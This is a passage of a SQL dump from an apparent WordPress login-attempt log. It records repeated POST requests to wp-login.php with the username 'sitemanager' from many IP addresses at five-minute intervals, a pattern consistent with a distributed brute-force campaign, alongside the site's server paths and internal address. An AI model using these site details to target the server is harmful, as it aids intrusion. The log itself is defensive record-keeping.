CRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746051818.8493559;s:12:\"REQUEST_TIME\";i:1746051818;}}','198.54.114.98',0,'2025-05-01 03:53:40','1970-01-01 00:00:00'),(94719,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50870\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746052123.7373519;s:12:\"REQUEST_TIME\";i:1746052123;}}','198.54.114.36',0,'2025-05-01 03:58:45','1970-01-01 00:00:00'),(94720,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39960\";s:11:\"REMOTE_ADDR\";s:15:\"114.119.174.226\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746052431.7029221;s:12:\"REQUEST_TIME\";i:1746052431;}}','114.119.174.226',0,'2025-05-01 04:03:53','1970-01-01 00:00:00'),(94721,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36446\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746052736.6463449;s:12:\"REQUEST_TIME\";i:1746052736;}}','23.239.27.53',0,'2025-05-01 04:08:58','1970-01-01 00:00:00'),(94722,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"22384\";s:11:\"REMOTE_ADDR\";s:13:\"185.88.153.48\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746053050.6811979;s:12:\"REQUEST_TIME\";i:1746053050;}}','185.88.153.48',0,'2025-05-01 04:14:12','1970-01-01 00:00:00'),(94723,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56626\";s:11:\"REMOTE_ADDR\";s:15:\"114.119.174.226\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746053357.5047579;s:12:\"REQUEST_TIME\";i:1746053357;}}','114.119.174.226',0,'2025-05-01 04:19:19','1970-01-01 00:00:00'),(94724,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35264\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.232.105\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746053667.2657039;s:12:\"REQUEST_TIME\";i:1746053667;}}','162.0.232.105',0,'2025-05-01 04:24:29','1970-01-01 00:00:00'),(94725,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36752\";s:11:\"REMOTE_ADDR\";s:15:\"186.209.113.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746053972.6870899;s:12:\"REQUEST_TIME\";i:1746053972;}}','186.209.113.104',0,'2025-05-01 04:29:34','1970-01-01 00:00:00'),(94726,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44110\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.55.211\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746054280.9874339;s:12:\"REQUEST_TIME\";i:1746054280;}}','51.75.55.211',0,'2025-05-01 04:34:42','1970-01-01 00:00:00'),(94727,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51174\";s:11:\"REMOTE_ADDR\";s:15:\"173.212.207.177\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746054589.341809;s:12:\"REQUEST_TIME\";i:1746054589;}}','173.212.207.177',0,'2025-05-01 04:39:51','1970-01-01 00:00:00'),(94728,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46856\";s:11:\"REMOTE_ADDR\";s:13:\"15.204.43.173\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746054901.3193319;s:12:\"REQUEST_TIME\";i:1746054901;}}','15.204.43.173',0,'2025-05-01 04:45:02','1970-01-01 00:00:00'),(94729,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 